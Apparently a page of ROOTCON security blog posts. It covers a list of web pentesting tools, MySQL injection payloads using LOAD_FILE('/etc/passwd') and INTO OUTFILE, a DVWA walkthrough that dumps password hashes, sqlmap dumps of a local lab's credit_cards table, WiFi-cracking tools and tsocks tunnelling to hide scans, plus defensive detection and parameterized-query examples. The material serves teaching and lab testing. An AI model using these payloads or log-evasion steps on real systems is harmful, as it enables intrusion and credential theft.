Channel: ROOTCON Blog

Introducing 35 Pentesting Tools Used for Web Vulnerability Assessment

1. w3af

w3af, or Web Application Attack and Audit Framework, is an open source penetration testing tool for finding web vulnerabilities and an exploit tool that comes with cool plugins like sqlmap, xssBeef, and davShell. w3af automatically updates itself every time you launch it, making it a very reliable tool for website hacking. For more information, check out their website hosted at SourceForge.

2. Acunetix Web Vulnerability Scanner


Acunetix WVS, or Web Vulnerability Scanner, is a pentesting tool for Windows users that checks for SQL injection, Cross Site Scripting (XSS), CRLF injection, code execution, directory traversal, file inclusion, vulnerabilities in file upload forms, and other serious web vulnerabilities. You can download this tool here.

3. SQLninja

SQLninja is an SQL injection tool for web applications that use Microsoft SQL Server as their back-end, though it runs only on Linux, Mac and BSD. It requires the Perl modules NetPacket, Net-Pcap, Net-DNS, Net-RawIP, and IO-Socket-SSL. You can download this tool here.

4. Nikto


Nikto is an open source web server scanner “which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.” The good thing about Nikto is that it is easy to use and scans quickly. Nikto is coded in Perl and was written by Chris Sullo and David Lodge. Not every check corresponds to a serious security problem, but most do, such as XSS (Cross Site Scripting) vulnerabilities, phpMyAdmin logins, etc. Nikto reports its findings along with security tips to help protect your website from various attacks.

5. SQLmap


SQLmap is an open source automatic SQL injection and database takeover tool that fully supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server. It partially supports Microsoft Access, DB2, Informix, Sybase and Interbase. Download sqlmap here.


6. Pangolin 3.2.3

Pangolin is another SQL injection scanner for web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, SQLite3, and Sybase. Its features include keyword auto analysis, HTTPS support, a bypass-firewall setting, an injection digger, a data dumper, etc. You can download its zip file here.

7. Havij v1.15 Advanced SQL Injection


Havij is another famous automatic SQL injection tool that comes in a free and a premium version. The free version only supports a few injection methods: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error union based, MySQL union based, MySQL blind, MySQL error based, MySQL time based, Oracle union based, MsAccess union based, and Sybase (ASE). It also includes an admin finder and an MD5 cracker.


8. SQL Power Injector

SQL Power Injector is a web pentesting application created in .NET 1.1 that helps penetration testers and hackers find and exploit SQL injections in web applications that use SQL Server, Oracle, MySQL, Sybase/Adaptive Server or DB2, but it is possible to use it with any existing database management system when using the inline injection or normal mode. You can download the latest version of this tool, which includes a Firefox plugin, here.

9. VulnDetector

VulnDetector is a project coded in python which scans a website and detects various web based security vulnerabilities in the website. It was developed by Brad Cable who is into coding open source tools. You can download the script here.

10. SQLIer 0.8.2b

SQLIer is another project of Brad Cable. It is a shell script that, given a URL, determines all the information needed to build and exploit an SQL injection vulnerability on its own, without user interaction unless it cannot guess the table or field names for the database correctly. SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. The script also does not use quotes in the exploit, meaning it will work for a wider range of sites. Download the shell script here.

11. bsqlbf-v2

bsqlbf-v2 or Blind Sql Injection Brute Forcer version 2 is a perl script that allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. It supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server databases. You can download the perl script on a Google hosted project.

12. Marathon Tool

Marathon Tool is an alpha-release SQL injection tool that extracts information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle databases by means of a time-based blind SQL injection attack. The alpha release can be found here.

13. XSSer


XSSer, or Cross Site "Scripter", is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It also includes a GUI, started with the command ./xsser --gtk. You can download XSSer's beta version here.

14. ASP Auditor v2.2


ASP Auditor v2.2 is an auditing tool for ASP that sends an initial probe request, a path discovery request, an ASP.NET validate discovery request, an ASP.NET Apr/07 XSS check, an application trace request, and a null remoter service request. With the -bf option, it lets you brute force the ASP.NET version using JS Validate directories.

15. Absinthe

"Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection.    This tool does not aid in the discovery of SQL Injection holes but speeds up the process of data recovery." It supports Microsoft SQL Server, MSDE, Oracle, and Postgres and the tool runs on Linux, Windows and Mac OSX. Download here.

16. SQID

SQID, or SQL injection digger, is a command line tool written in Ruby by Metaeye Security Group that looks for SQL injections and common errors in web sites. It can run a Google search to find SQL injections and common errors in web site URLs, and it can crawl a web page. You can download this tool by checking out its project SVN:

svn checkout svn://rubyforge.org/var/svn/sqid

17. DarkMySQLi


DarkMySQLi is a multi purpose MySQL Injection tool coded in python which is also available for BackTrack 5 as one of its packed tools.

18. fimap


fimap is an automatic LFI/RFI scanner and exploiter coded in Python by Iman Karim. It allows a pentester to scan a single URL for file inclusion errors, scan a list of URLs for file inclusion errors, scan Google search results for file inclusion errors, and harvest all links of a webpage to a recursion level of 3 and write the URLs to a file.

19. Script Hex Dump - Forensic Tool

Script Hex Dump - Forensic Tool is a Java application that parses a script, such as a PHP file, and automatically converts it to hex values. Some penetration testers use this when testing a website for possible SQL injection vulnerabilities. SQL injection has been a chronic threat, especially for websites running PHP with MySQL as the backend database server; if the server is not properly configured, one of its capabilities is writing arbitrary files. You can download this tool here.

20. PHP Vulnerability Hunter


PHP Vulnerability Hunter is a PHP web application fuzzer that scans for common vulnerabilities like local file inclusion, SQL injection, full path disclosure, arbitrary command execution and many more. It is a good tool for analyzing your own web server. You can grab the newest version of this tool, 1.1.4.6, here.

21. WSTOOL : Web vulnerable scan tool


WSTOOL is a scanner for server errors, SQL injection and XSS (Cross Site Scripting) that uses PHP to check up on and collate HTML forms and links. You can download this tool here.

22. ProjectX WHMCS Pentesting Tool v.1




ProjectX WHMCS Pentesting Tool v.1 is a vulnerability scanner coded in VB.NET that uses a black box approach. It echoes the db_username and db_password of a website that is vulnerable to the WHMCS Local File Disclosure. This vulnerability only applies to versions 3.x.x and some 4.x.x; it was a viral exploit last year that some website administrators took for granted. You can download the tool here.

23. Wpscan 


WPScan, or WordPress Security Scanner, is a pentesting tool written in Ruby for WordPress installations. The tool is coded by Ryan Dewhurst and uses a black box approach to find security holes in WordPress, such as timthumb, easy to guess passwords, plugin holes, etc. You can download WPScan here.

24. Skipfish

Skipfish is an active web application security reconnaissance tool written by Michal Zalewski. Skipfish spiders a URL using wordlists; it is a very powerful web scanning tool with a simple implementation. It also scans for vulnerabilities like PHP injection, XSS, format string vulnerabilities, overflow vulnerabilities, file inclusions, etc. You can download this tool here.


25. WhatWeb


WhatWeb is a web scanner coded by Andrew Horton aka urbanadventurer from Security-Assessment.com. It is used for information gathering because it identifies content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers, etc. You can download this tool here.

26. OWASP ZAP

Zed Attack Proxy (ZAP) is an OWASP project: a GUI penetration testing tool for finding website vulnerabilities and flaws. This open source tool includes features like an intercepting proxy, active scanner, passive scanner, brute force scanner, spider, fuzzer, port scanner, dynamic SSL certificates, an API, and BeanShell integration. For more information about this tool, check out their website.

27. Webshag


Webshag is a multi-threaded, multi-platform web server auditing tool coded in python. It is used for crawling a URL, port scanning, file fuzzing and audits your website. You can download this security auditing tool here.

28. OWASP DirBuster


DirBuster is another OWASP project: a multi-threaded Java application designed to brute force directory and file names on web/application servers. It uses a black box approach to application testing by trying to find hidden content. You can download this tool here.

29. Grendel-Scan

Grendel-Scan is a free and open source web application pentesting tool that has an automatic scanning feature to detect common web application vulnerabilities, as well as features geared at aiding manual penetration tests. Get this tool now.

30. Mopest


Mopest is a Perl local PHP vulnerability scanner that includes exploits for phpBB 2.0.20 Disable Administrator, phpBB 2.0.19 Denial of Service - Infinitely topic, phpBB 2.0.15 Database Authentication Details, Invision Power Board 2.0.2 Multiple Users DoS, Invision Power Board 2.1.5 Code Execution, MyBB 1.0 RC4 SQL Injection, MyBB 1.1.3 Create An Admin, MyBB SQL Injection, and WordPress 1.5.11 SQL Injection. It also has tools like a Fake Mailer, Email Bomber, and MD5 Cracker. You can check out this project here.

31. SecuBat

SecuBat is another web vulnerability scanner which automatically analyzes web sites with the aim of finding exploitable SQL injection and XSS vulnerabilities. You can check this tool here.

32. Arachni




Arachni is an open source web application security scanner framework coded in ruby that helps website administrators and penetration testers evaluate the security of a web application. Arachni asks you for the URL of the target and it automatically performs a simple scan and presents you with its findings which could be a very risky flaw or loophole. You can download this tool here.

33. WebSlayer


WebSlayer is another OWASP project that slays your web application by brute forcing GET and POST parameters, checking directories, brute forcing login forms, fuzzing, brute forcing sessions, NTLM brute forcing, and many more. For more information on this project, check this site.

34. Burp Suite




Burp Suite is a penetration testing tool and integrated platform for website security. Burp Suite has cool features like an intercepting proxy, an application spider for crawling, detection of numerous web application vulnerabilities, a repeater tool, support for writing your own plugins, and many more. The free edition is available for download here.

35. ProxMon


ProxMon is not a Digimon but a Python based open source framework that automates web application tests. Its key features include:

- automatic value tracing of set cookies, sent cookies, query strings and post parameters across sites
- proxy agnostic
- included library of vulnerability checks
- active testing mode
- cross platform
- easy to program, extensible Python framework

You can download this tool here.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

SQL Injection Using MySQL LOAD_FILE() and INTO OUTFILE()

SQL injection is one of the most chronic threats to websites today. There are many SQL injection techniques, such as the use of UNION statements, ORDER BY statements, LOAD_FILE(), INTO OUTFILE, INFORMATION_SCHEMA, CHAR(), CAST(), and LIMIT. Most attackers only use UNION statements, information_schema and ORDER BY, neglecting the other techniques, just for the sake of getting the username and password of the website administrator. Just like this:

' union select 1,username,password,4 from users -- -



But just because some attackers don't use the other techniques doesn't mean you are safe from the attackers who do. All right, let's get to the point: in this article, let's discuss some of the things an attacker can do using the LOAD_FILE() and INTO OUTFILE functions together with UNION SELECT statements.

MySQL LOAD_FILE() reads a file and returns its contents as a string.

SYNTAX : LOAD_FILE(file_name) /* file_name should be the name of a file, including its path. */

Wait, a path? Yes, you read that right. That means an attacker could possibly do a directory traversal, just like in a Local File Inclusion (LFI) attack.

Suppose we have found out the number of columns; then we execute the UNION SELECT query together with the LOAD_FILE() function to achieve the attack vector. In this example we are

' union select 1,load_file('/etc/passwd'),3,4 -- -


This is very dangerous: if an attacker gets to see the password hashes of user accounts in /etc/shadow, he or she may try to crack them. For detailed information about directory traversal, check out my previous article, Local File Inclusion 101.

Next up, INTO OUTFILE. This clause lets the attacker create a file at the path given after INTO OUTFILE '.

Take for example this:

' union select 1,'shipcode was here',3,4 into outfile '/tmp/lol.txt' -- -

OR

 ' union select null,'shipcode was here',null,null into outfile '/tmp/lolz.txt' -- -

So, in case /var/www/ is writable, the attacker could put a PHP system call into the injected string and have the query write it to an outfile.
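The primitives this article walks through leave recognizable traces in web server logs. The following is an added example, not code from the original post: a small Python detector that flags UNION SELECT, LOAD_FILE, INTO OUTFILE, information_schema and ORDER BY probes in common-log-format access log lines, after URL-decoding them and stripping the inline comments used to split keywords. The log lines, IP addresses and paths are constructed for the example.

```python
"""Detect MySQL injection primitives in web server access logs.

Added example; the sample log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the common log format (placeholder IPs and paths).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2012:10:00:01 +0800] "GET /news.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Apr/2012:10:00:02 +0800] "GET /news.php?id=1'%20union%20select%201,load_file('/etc/passwd'),3,4%20--%20- HTTP/1.1" 200 2048
10.0.0.5 - - [01/Apr/2012:10:00:03 +0800] "GET /news.php?id=1'+union+select+1,'x',3,4+into+outfile+'/tmp/lol.txt'+--+- HTTP/1.1" 500 233
10.0.0.7 - - [01/Apr/2012:10:00:04 +0800] "GET /news.php?id=2 HTTP/1.1" 200 498
10.0.0.7 - - [01/Apr/2012:10:00:05 +0800] "GET /news.php?id=1'%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables%20--%20- HTTP/1.1" 200 900
"""

# ip, ident, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The primitives discussed in the article, matched against the decoded,
# comment-stripped, whitespace-normalized, lower-cased request target.
PRIMITIVES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\."),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
}


def normalize(target: str) -> str:
    """URL-decode twice (catches %2527-style double encoding), drop /**/ comments
    that attackers use to split keywords, and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(target))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def classify_request(target: str) -> list:
    """Return the names of the injection primitives present in one request target."""
    text = normalize(target)
    return [name for name, pattern in PRIMITIVES.items() if pattern.search(text)]


def analyze_log(log_text: str) -> list:
    """Parse common-log-format lines; return one finding dict per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a well-formed access log line; skip it
        hits = classify_request(match.group("target"))
        if hits:
            findings.append({
                "ip": match.group("ip"),
                "timestamp": match.group("ts"),
                "status": int(match.group("status")),
                "primitives": hits,
                "target": match.group("target"),
            })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["ip"], finding["timestamp"], finding["status"],
              ",".join(finding["primitives"]), finding["target"])
```

On the database side, LOAD_FILE() and INTO OUTFILE require the FILE privilege and are restricted by MySQL's secure_file_priv setting, so a web application account without FILE cannot use either primitive even when the injection itself succeeds.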



SQL Injection Cheat Sheet for Damn Vulnerable Web Application

Damn Vulnerable Web Application, or DVWA, is one of my favorite web applications for website penetration testing and web attacking. It is easier for the learner to attack the web application because there are View Source and View Help buttons. These give the pentester some hints about the web application, such as the actual SQL query.

In this paper, I will give some tips on how SQL injection is done in order to get the usernames and passwords in the database that DVWA is using. We will attack the web application using manual SQL queries, without automated tools like sqlmap, sqlninja, mole, etc., because the best way to learn web penetration testing is to do it manually. That said, let me not discourage you from using tools, because tools can be of great help.

So now let's start, this is the vulnerable web page for SQL Injection:


Now let's try to put a value on the User ID Field and see what happens.

User ID: 1


Right, the result is:

ID: 1
First name: admin
Surname: admin

It pulled out the first_name and the surname of the User ID number 1. Thus if we put another value like 2 it should give another result. The actual SQL query:

SELECT first_name, last_name FROM users WHERE user_id ='1';

That's why it pulled the columns first_name and last_name from the table users for the row whose user_id is 1.

Now let's put a single quote (') after the user_id value 1 to check how the web application reacts and how it handles quotes.

Yes, it is exploitable, because the single quote is passed straight into the SQL query instead of being handled as data.

Now it's time to find the number of columns in the query by using ORDER BY and incrementing the number by 1 until the application gives an error. We use the comment character # at the end, or you may use the comment sequence -- - to close the query after the single quote. :)

1' order by 1 #
1' order by 2 #
1' order by 3 # > error

From what you can see from the image above, it returns an error after the statement SELECT first_name, last_name FROM users WHERE user_id ='1' order by 3 # because column 3 doesn't exist thus there are only two columns that we can use. 

 Now let's use the Union Select Statement:

1' union select 1,2 #


Now, from the image above, you can see two numbers, 1 and 2, in the First Name and Surname output. Yeah, the page is a bit messed up, and on some websites only the numbers will appear on the page.

These numbers are the column positions we can get information from. We will replace them with statements later on. In fact, you can replace either of the numbers you entered in the UNION SELECT with an expression. Take for example finding the MySQL version:

1' union select @@version,2 #

or

1' union select version(),2 #


Hello version 5.1.41!

Now let's find the tables in the database:

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #


Boooom! The users table should contain good information :))

Now let's try to check the all the columns in the database:

1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() #


Did I just see the column names user and password? Yeah, we can use those column names.

Now it's time to pwn the users table:

1' union select user,password from users #


Thus, the next thing that an attacker should do is to crack the hashed passwords of users admin, gordonb, 1337, pablo and smith.

Find the current database user and pwn him

Now let's find the current database user of this web application:
1' union select user(),2 #
or
1' union select system_user(),2 #


Hey, it's running as root; if that's the case then I can list the hashed passwords from mysql.user:
1' union select user,password from mysql.user #


Very risky, isn't it? That is why you should fix your code, for example by using mysql_real_escape_string, clean URLs, a web application firewall, parameterized queries and array_map.
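To show why parameterized queries are the fix, here is an added example (not from the original post, and not DVWA's own code): the lookup from this article, SELECT first_name, last_name FROM users WHERE user_id = '...', written once with string concatenation and once with a bound parameter, run against an in-memory SQLite table with constructed rows. SQLite does not understand the # comment, so the payloads use the -- - sequence mentioned above; the user names are the ones listed in the article and the password column holds placeholder strings.

```python
"""DVWA-style user lookup: concatenated SQL versus a parameterized query.

Added example using an in-memory SQLite database with constructed rows.
"""
import sqlite3

# Constructed sample data: user names from the article, placeholder "hashes".
USERS = [
    (1, "admin", "admin", "admin", "hash_admin"),
    (2, "Gordon", "Brown", "gordonb", "hash_gordonb"),
    (3, "Hack", "Me", "1337", "hash_1337"),
    (4, "Pablo", "Picasso", "pablo", "hash_pablo"),
    (5, "Bob", "Smith", "smith", "hash_smith"),
]


def make_db() -> sqlite3.Connection:
    """Create the users table that the article's query reads from."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The DVWA pattern: user input is pasted into the SQL text, so anything
    typed after a closing quote becomes part of the statement."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterized query: the driver binds the input as a value, so quotes,
    UNION keywords or comment sequences inside it are never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# The inputs from the article, with '-- -' as the comment terminator.
NORMAL_INPUT = "1"
COLUMN_PROBE = "1' order by 3 -- -"
DUMP_PAYLOAD = "1' union select user, password from users -- -"


def column_probe_errors(conn: sqlite3.Connection, lookup) -> bool:
    """True when the ORDER BY probe makes the query fail: that error is what
    tells the attacker the query has only two columns."""
    try:
        lookup(conn, COLUMN_PROBE)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal input:", lookup_vulnerable(conn, NORMAL_INPUT))
    print("vulnerable, probe errors:", column_probe_errors(conn, lookup_vulnerable))
    print("vulnerable, dump payload:", lookup_vulnerable(conn, DUMP_PAYLOAD))
    print("safe, probe errors      :", column_probe_errors(conn, lookup_safe))
    print("safe, dump payload      :", lookup_safe(conn, DUMP_PAYLOAD))
```

With the bound parameter, both the ORDER BY probe and the UNION payload are compared literally against user_id and simply match no row.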

Check out my previous article too which is also a cheat sheet for DVWA:

 


ROOTCON 6 Registration Now Live!!!

This year's ROOTCON is even more awesome with our selected tracks and carefully planned activities. As of April 1, 2012, we are pleased to announce that the early registration for ROOTCON 6 is now live.

Our updated tracks (here) updated real time
Our awesome speakers (here)
This year's venue (here)


Last year we had two Registration methods: Paypal and Offline payment (manually sending out email to registration [at] rootcon dot org). The tagging of attendees was pretty hard for the ROOTCON crew, thus, this year we opted to have a new registration system which is EventBrite. You will still have the option to pay offline or pay through PayPal but the up-side for us is that tagging of attendees and slots is much more precise, so we won't be re-opening the registration over and over again after we recount our available slots.

On the new registration system there will still be offline payments through direct deposit and there will also be PayPal payments. You will still receive an e-ticket for the event marked as payment-not-received, however, your reservation will stay on the system for 48 hours, FAILURE OF PAYMENT WITHIN 48 HOURS WILL FORFEIT YOUR RESERVATION. If you deposited your payment already, send us a copy of the scanned deposit slip to registration [at] rootcon dot org with subject [ROOTCON 6 REGISTRATION - YOUR NAME] and we will be sending you another e-ticket marked as payment-received. For Paypal payment you will receive your e-ticket right away after you purchase them.

PRINT YOUR E-TICKET and BRING THEM TO THE CONFERENCE CHECK-IN DESK TO RECEIVE YOUR BADGE AND OTHER FREEBIES

What are you waiting for? GRAB YOUR TICKET NOW!!!!

See you at the CON
Semprix and the ROOTCON Crew

Call For InfoSec Celebs


Who Wants To Speak?

ROOTCON is looking for InfoSec celebrities, both local and international. If you think you have the skills and talents to be one of the InfoSec celebrities, we will be delighted if you join us =)

As a backgrounder ROOTCON is a grassroots event, organized by users for users.  We welcome attendees from all over the world, after all security is borderless and global in nature.   We support sharing best practices and appreciate cooperation from our international supporters.  If you would like to speak at our event and reside outside the Philippines, we will be happy to sponsor your hotel but are currently not able to sponsor any international airfares due to our volunteer-driven organization.  


 Support the Hacker Community Globally!!!

Hackers Unite

We want you to come!!!

We want you to be able to join the fun and learning we share at ROOTCON, so we made it easy for everyone to get approval from your boss and HR personnel. You may download our pre-formatted and digitally signed Letter Of Approval.

Download the Letter Of Approval  

3 Common Automated Tools with GUI Used for Wireless Cracking / Pentesting

1. wifite

wifite is a mass WEP/WPA WiFi cracker coded in Python that makes cracking WiFi passwords and security easier; it uses the aircrack-ng suite. It can be executed with python wifite.py or ./wifite.py. To see a list of command line options with detailed information for the script, type ./wifite.py --help or python wifite.py --help in the terminal. What makes this tool easier is that it also has a GUI mode, which runs by default after executing the script if the python-tk module is installed. You can download the Python script here.



2. Fern WIFI Cracker

Fern Wifi Cracker is another GUI for easier wireless penetration testing that uses the aircrack-ng suite of tools. It is coded in Python and uses python-qt4. It is very similar to wifite because you need macchanger, xterm, and aircrack-ng as prerequisites, but it uses python-qt4 instead of python-tk for the GUI. You can download this project here.


3. Gerix Wifi Cracker

Gerix Wifi Cracker is a simple graphical user interface just like wifite and Fern Wifi Cracker. It is a project made by Tiger Security and has been one of the tools included in BackTrack Linux since BackTrack 4 Pre-Final, if I'm not mistaken. It's also coded in Python and you need Qt (v.3) for it. You can download it here or, if you are using BackTrack, you should be able to find this tool in /usr/share/gerix-wifi-cracker-ng.




Dumping Like a Boss - sqlmap 101


sqlmap is one of the most commonly used tools for web application penetration testing because it is open source and automates SQL injection attacks, and it also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. It is coded in Python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have found a vulnerable link. We pass the target URL with -u and append --dbs to enumerate the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+----------------+
| accounts       |
| blogs_table    |
| captured_data  |
| credit_cards   |
| hitlog         |
| pen_test_tools |
+----------------+


Now let's try to dump all the columns for the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts;

Now let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump


Similar query: Select * from credit_cards;

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.



ROOTCON Easter Egg Hunt

Here we go, ROOTCON Easter Egg Hunt.

Instructions (Read Carefully)
1. Search for each word contained on each egg
2. Gather all words found on each egg
3. Combine all words into one
4. Send your code to registration [at] rootcon d0t org
5. You are entitled to a 50% discount ;-)

Start cracking some eggs at http://easteregg.rootcon.org/

Remember: This is a race, so the promo code is valid for one use only 

GOOD LUCK!!! and HAPPY EASTER 

ROOTCON Easter Egg Solution

The ROOTCON Easter Egg Hunt is over. The hunt was pretty simple and straightforward; you just needed to know some of the basic arsenal of your day-to-day hacking escapades.

The Solution:

Easter Egg #1 = The image shows Master Yoda speaking the very familiar line "May the source be with you" followed by "A n00b you are". If you are a geek and into tech, you wouldn't miss watching Star Wars; the line "May the force be with you" had force replaced with source, hinting that the first egg can be found in the source code of the page egg1.php.

Easter Egg #2 = Easter Egg #2 has something to deal with braille, we gave the hint "3 blind mice", so you need to decode the braille dots into letters.

Easter Egg #3 = The ROOTCON Vault. This is pretty easy: you can decode the vault using uudecode, or even Perl can unpack it. The first line of the vault says Begin blah blah, which should give you enough of a hint about how it was encoded.

Easter Egg #4 = This Easter Egg is very simple; the picture of Cookie Monster says it all, plus the text we placed: "Cookie" Monster, "No Cookie For You". The hint tells you that the next word is hidden in the site cookie. There are a lot of browser add-ons and plugins that will let you examine what is written in a cookie, and Google Chrome has its native Developer Tools to do that.

Easter Egg #5 = Again going back to the image text for hints, it says "Undress the ROOTCON Easter Bunny". The Easter bunny is an image; to undress it, or to get the information hidden in an image, you need to examine the EXIF attributes of the image.

Only the first one to crack all the codes is entitled to the 50% discount offer on the ROOTCON 6 ticket.

Here are the top four winners (Click the image to enlarge)
(Note: We masked the Lastname of the winners to protect their identity)




I hope everyone enjoyed our little Easter Special.

ROOTCON


Tunneling the Applications you launched on your Terminal with Tsocks

Some applications have no proxy configuration or settings, so how can we add anonymity to our information gathering, scanning and exploiting phases, like running nmap, using theHarvester to gather emails, and so on? It's bad leaving your footprints in logs, right?

Well if we have tsocks application then it would be easier since it can send TCP connections automatically through a SOCKS server. If tsocks is not installed on your distro, you can just find it on the software repository. In my case, BackBox Linux has tsocks pre-installed. It can be used for TORifying or tunneling your applications that doesn't have proxy capabilities. Supposed I opened a certain SSH server then binded my localhost at 9191 TCP port, I need to configure /etc/tsocks.conf to:

local = 192.168.0.0/255.255.255.0
server = 127.0.0.1
server_type = 5
server_port = 9191
For Tor, just change server_port to 9050, because Tor opens a local SOCKS server on TCP port 9050.

The SSH dynamic forward on local port 9191 itself is opened with:

ssh -D 9191 user@hostname

After configuring tsocks, check that it is working by using the lynx web browser to connect to a website that shows the IP you are arriving from, or tunnel to another SSH server and issue w or who there. Be sure to put tsocks before the command. For example:

tsocks lynx whatismyip.net

The IP of the SSH Server ;)

The image below is my original IP without using ssh tunneling:


See the difference ayt!

So if I want to launch theHarvester (an email harvester) anonymously, I need to add tsocks before the theharvester command:

tsocks theharvester -d rootcon.org -l 500 -b google


Now you can run your pentesting tools with added anonymity :)
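As an added example (not code from the original post), here is a small pre-flight wrapper around tsocks: it reads the SOCKS server out of a tsocks.conf file and only launches the wrapped tool once that server port actually accepts a TCP connection, so a tunnel that silently died (the ssh -D session timed out, Tor was not started) is noticed before the scan starts rather than showing up as a pile of confusing connection errors. It assumes tsocks honours the TSOCKS_CONF_FILE environment variable and that bash and coreutils timeout are available.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: a pre-flight check for tsocks.
# Assumption: tsocks honours the TSOCKS_CONF_FILE environment variable.

# tsocks_conf_target [CONF]: print "SERVER PORT TYPE" parsed from CONF
# (default /etc/tsocks.conf). Defaults for missing keys follow tsocks.conf:
# server_port 1080, server_type 4. Fails if no server line is present.
tsocks_conf_target() {
  local conf="${1:-/etc/tsocks.conf}" server="" port="1080" type="4" key val
  while IFS='=' read -r key val || [ -n "$key" ]; do
    key=$(printf '%s' "${key%%#*}" | tr -d ' \t')   # drop comments and blanks
    val=$(printf '%s' "${val%%#*}" | tr -d ' \t')
    case "$key" in
      server)      server="$val" ;;
      server_port) port="$val" ;;
      server_type) type="$val" ;;
    esac
  done < "$conf"
  [ -n "$server" ] || return 1
  printf '%s %s %s\n' "$server" "$port" "$type"
}

# socks_reachable HOST PORT: 0 if a TCP connect to HOST:PORT succeeds within 3 s.
# Uses bash's /dev/tcp so no extra tools are needed for the probe.
socks_reachable() {
  timeout 3 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# tsocks_run TOOL [ARGS...]: verify the configured SOCKS server is up, then
# run "tsocks TOOL ARGS" with the same configuration file.
tsocks_run() {
  local conf="${TSOCKS_CONF_FILE:-/etc/tsocks.conf}" target server port type
  target=$(tsocks_conf_target "$conf") || {
    echo "tsocks_run: no server line in $conf" >&2; return 2; }
  read -r server port type <<EOF
$target
EOF
  if [ "$type" != 5 ]; then
    echo "tsocks_run: note server_type=$type (ssh -D and Tor both speak SOCKS5)" >&2
  fi
  socks_reachable "$server" "$port" || {
    echo "tsocks_run: nothing listening on $server:$port, is the tunnel up?" >&2
    return 3; }
  TSOCKS_CONF_FILE="$conf" tsocks "$@"
}

# Usage (after "ssh -D 9191 user@hostname" is up):
#   tsocks_run theharvester -d rootcon.org -l 500 -b google
```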


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.

ClubHack Magazine April 2012 Issue Released!


